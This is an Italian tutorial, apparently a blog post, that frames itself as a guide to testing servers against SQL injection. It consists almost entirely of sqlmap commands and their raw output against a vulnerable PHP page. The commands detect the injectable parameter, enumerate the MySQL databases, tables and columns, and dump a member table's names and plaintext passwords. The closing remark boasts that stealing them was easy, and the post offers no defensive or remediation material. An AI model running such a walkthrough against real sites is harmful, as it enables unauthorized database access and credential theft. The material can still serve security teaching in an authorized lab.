Premessa
Questa piccola guida ha come scopo principale quello di istruire eventuali sistemisti/DBA/developer su come testare la robustezza del proprio server/applicativo contro gli attacchi basati sull’SQL injection.
sqlmap
Un tool abbastanza semplice da utilizzare per effettuare questo tipo di test prende il nome di sqlmap.
Ecco quali sono gli step che ho seguito per “dumpare” il contenuto di un database mySQL presente dietro un portale Web “bacato”:
C:\UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 08:05:07 [08:05:07] [INFO] using 'C:UserseldoDesktopsqlmapoutputvulnsite.itsession' as session file [08:05:07] [INFO] testing connection to the target url [08:05:08] [INFO] testing if the url is stable, wait a few seconds [08:05:10] [INFO] url is stable [08:05:10] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [08:05:11] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [08:05:11] [INFO] testing if GET parameter 'id' is dynamic [08:05:12] [INFO] confirming that GET parameter 'id' is dynamic [08:05:13] [INFO] GET parameter 'id' is dynamic [08:05:13] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis [08:05:13] [INFO] testing unescaped numeric injection on GET parameter 'id' [08:05:14] [INFO] confirming unescaped numeric injection on GET parameter 'id' [08:05:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare nthesis [08:05:14] [INFO] testing for parenthesis on injectable parameter [08:05:16] [INFO] the injectable parameter requires 0 parenthesis [08:05:16] [INFO] testing MySQL [08:05:17] [INFO] confirming MySQL [08:05:18] [INFO] retrieved: 3 [08:05:23] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.3, ASP.NET back-end DBMS: MySQL >= 5.0.0 [*] shutting down at: 08:05:23 Una volta constatato che il portale è vulnerabile, procedo con l'enumerazione dei DBMS: C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 --dbs sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 08:06:20 [08:06:20] [INFO] using 'C:UserseldoDesktopsqlmapoutputs12447-15xnnvzre.ro ma.coliseumlab.netsession' as session file [08:06:20] [INFO] resuming match ratio '0.946' from session file [08:06:20] [INFO] resuming injection point 'GET' from session file [08:06:20] [INFO] resuming injection parameter 'id' from session file [08:06:20] [INFO] resuming injection type 'numeric' from session file [08:06:20] [INFO] resuming 0 number of parenthesis from session file [08:06:20] [INFO] resuming back-end DBMS 'mysql 5' from session file [08:06:20] [INFO] testing connection to the target url [08:06:20] [INFO] testing for parenthesis on injectable parameter [08:06:20] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.3, ASP.NET back-end DBMS: MySQL 5 [08:06:20] [INFO] fetching database names [08:06:20] [INFO] fetching number of databases [08:06:20] [INFO] retrieved: 2 [08:06:25] [INFO] retrieved: information_schema [08:08:05] [INFO] retrieved: 12447_15_1 available databases [2]: [*] 12447_15_1 [*] information_schema [08:09:04] [INFO] Fetched data logged to text files under 'C:UserseldoDesktop sqlmapoutputvulnsite.it' [*] shutting down at: 08:09:04 Uso come target il DB 12447_15_1 e procedo con l'enumerazione delle tabelle: C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 --tables sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 08:06:20 [08:12:07] [INFO] using 'C:UserseldoDesktopsqlmapoutputvulnsite.itsession' as session file [08:12:07] [INFO] resuming match ratio '0.946' from session file [08:12:07] [INFO] resuming injection point 'GET' from session file [08:12:07] [INFO] resuming injection parameter 'id' from session file [08:12:07] [INFO] resuming injection type 'numeric' from session file [08:12:07] [INFO] resuming 0 number of parenthesis from session file [08:12:07] [INFO] resuming back-end DBMS 'mysql 5' from session file [08:12:07] [INFO] testing connection to the target url [08:12:08] [INFO] testing for parenthesis on injectable parameter [08:12:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.3, ASP.NET back-end DBMS: MySQL 5 [08:12:08] [INFO] fetching tables for database '12447_15_1' [08:12:08] [INFO] fetching number of tables for database '12447_15_1' [08:12:08] [INFO] retrieved: 2 [08:12:13] [INFO] retrieved: books [08:12:41] [INFO] retrieved: club_members Database: 12447_15_1 [2 tables] +--------------+ | books | | club_members | +--------------+ [08:13:43] [INFO] Fetched data logged to text files under 'C:UserseldoDesktop sqlmapoutputvulnsite.it' [*] shutting down at: 08:13:43 Adesso procedo con l'enumerazione delle colonne relative alla tabella club_members: C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 -T club_members --columns sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 08:21:36 [08:21:36] [INFO] using 'C:UserseldoDesktopsqlmapoutputs12447-15xnnvzre.ro ma.coliseumlab.netsession' as session file [08:21:36] [INFO] resuming match ratio '0.946' from session file [08:21:36] [INFO] resuming injection point 'GET' from session file [08:21:36] [INFO] resuming injection parameter 'id' from session file [08:21:36] [INFO] resuming injection type 'numeric' from session file [08:21:36] [INFO] resuming 0 number of parenthesis from session file [08:21:36] [INFO] resuming back-end DBMS 'mysql 5' from session file [08:21:36] [INFO] testing connection to the target url [08:21:37] [INFO] testing for parenthesis on injectable parameter [08:21:37] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.3, ASP.NET back-end DBMS: MySQL 5 [08:21:37] [INFO] fetching columns for table 'club_members' on database '12447_1 5_1' [08:21:37] [INFO] fetching number of columns for table 'club_members' on databas e '12447_15_1' [08:21:37] [INFO] retrieved: 6 [08:21:42] [INFO] retrieved: id [08:21:56] [INFO] retrieved: mediumint(8) unsigned [08:23:46] [INFO] retrieved: name [08:24:13] [INFO] retrieved: varchar(255) [08:25:21] [INFO] retrieved: city [08:25:46] [INFO] retrieved: varchar(50) [08:26:47] [INFO] retrieved: zip [08:27:06] [INFO] retrieved: varchar(10) [08:28:04] [INFO] retrieved: username [08:28:53] [INFO] retrieved: varchar(255) [08:29:57] [INFO] retrieved: password [08:30:47] [INFO] retrieved: varchar(255) Database: 12447_15_1 Table: club_members [6 columns] +----------+-----------------------+ | Column | Type | +----------+-----------------------+ | city | varchar(50) | | id | mediumint(8) unsigned | | name | varchar(255) | | password | varchar(255) | | username | varchar(255) | | zip | varchar(10) | +----------+-----------------------+ [08:31:51] [INFO] Fetched data logged to text files under 'C:UserseldoDesktop sqlmapoutputvulnsite.it' [*] shutting down at: 08:31:51 Infine, poichè ora conosco la struttura della tabella, posso effettuare il dump dei campi che mi interessano, ovvero name e password: C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 -T club_members -C name,password --dump sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 08:39:44 [08:39:44] [INFO] using 'C:UserseldoDesktopsqlmapoutputs12447-15xnnvzre.ro ma.coliseumlab.netsession' as session file [08:39:44] [INFO] resuming match ratio '0.946' from session file [08:39:44] [INFO] resuming injection point 'GET' from session file [08:39:44] [INFO] resuming injection parameter 'id' from session file [08:39:44] [INFO] resuming injection type 'numeric' from session file [08:39:44] [INFO] resuming 0 number of parenthesis from session file [08:39:44] [INFO] resuming back-end DBMS 'mysql 5' from session file [08:39:44] [INFO] testing connection to the target url [08:39:45] [INFO] testing for parenthesis on injectable parameter [08:39:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.3, ASP.NET back-end DBMS: MySQL 5 [08:39:45] [INFO] fetching columns 'name, password' entries for table 'club_memb ers' on database '12447_15_1' [08:39:45] [INFO] fetching number of columns 'name, password' entries for table 'club_members' on database '12447_15_1' [08:39:45] [INFO] read from file 'C:UserseldoDesktopsqlmapoutputs12447-15x nnvzre.roma.coliseumlab.netsession': 30 [08:39:45] [INFO] retrieved: Ignacia [08:40:23] [INFO] read from file 'C:UserseldoDesktopsqlmapoutputs12447-15x nnvzre.roma.coliseumlab.netsession': AYM91SVH8JL [08:40:23] [INFO] retrieved: Isaac [08:40:51] [INFO] retrieving the length of query output [08:40:51] [INFO] retrieved: 11 [08:41:06] [INFO] resumed from file 'C:UserseldoDesktopsqlmapoutputs12447- 15xnnvzre.roma.coliseumlab.netsession': WVJ39RFZ... [08:41:06] [INFO] retrieving pending 3 query output characters [08:41:25] [INFO] retrieved: Roth [08:41:50] [INFO] retrieved: PRK18UOR6YA [08:42:51] [INFO] retrieved: Laurel [08:43:24] [INFO] retrieved: RKS21YTS6EV [08:44:27] [INFO] retrieved: Ina [08:44:47] [INFO] retrieved: HHQ64HDD7VJ [08:45:50] [INFO] retrieved: Samantha [08:46:33] [INFO] retrieved: BAA37FRB5IR [08:47:30] [INFO] retrieved: Walter [08:48:04] [INFO] retrieved: AQD75ZVP9WA [08:49:02] [INFO] retrieved: Petra [08:49:31] [INFO] retrieved: BAI67DMT7PN [08:50:29] [INFO] retrieved: Fleur [08:50:58] [INFO] retrieved: PJE89BUA1DP [08:51:58] [INFO] retrieved: Rowan [08:52:30] [INFO] retrieved: FCY82VKV1PS [08:53:29] [INFO] retrieved: Cairo [08:53:59] [INFO] retrieved: GGT75OJT6IO [08:54:57] [INFO] retrieved: Ruud [08:55:23] [INFO] retrieved: 166648 [08:55:58] [INFO] retrieved: Cheryl [08:56:33] [INFO] retrieved: WJI80JKK9XQ [08:57:30] [INFO] retrieved: Olivia [08:58:03] [INFO] retrieved: PMO19LFU8OP [08:59:00] [INFO] retrieved: Sara [08:59:24] [INFO] retrieved: UHE33ZHA4VD [09:00:22] [INFO] retrieved: Hermione [09:01:04] [INFO] retrieved: AHW26AKK3PT [09:02:01] [INFO] retrieved: Jingo [09:02:30] [INFO] retrieved: KFV13NWK8SR [09:03:27] [INFO] retrieved: Ingrid [09:04:01] [INFO] retrieved: GSR33YLT1GY [09:04:59] [INFO] retrieved: Kay [09:05:19] [INFO] retrieved: MZO03VPQ5GA [09:06:17] [INFO] retrieved: Stone [09:06:47] [INFO] retrieved: JCD09KIK3XN [09:07:46] [INFO] retrieved: Quinn [09:08:15] [INFO] retrieved: IRC74DPU2TU [09:09:13] [INFO] retrieved: Castor [09:09:48] [INFO] retrieved: DCA08WQE5SW [09:10:46] [INFO] retrieved: Wyoming [09:11:25] [INFO] retrieved: XFL08LPA5QA [09:12:24] [INFO] retrieved: Harlan [09:12:58] [INFO] retrieved: HOO93MSH6EK
Per fortuna le password sono salvate in chiaro (e non sottoforma di HASH), dunque “rubarle” è stato un gioco da ragazzi.
Fine del post, a presto.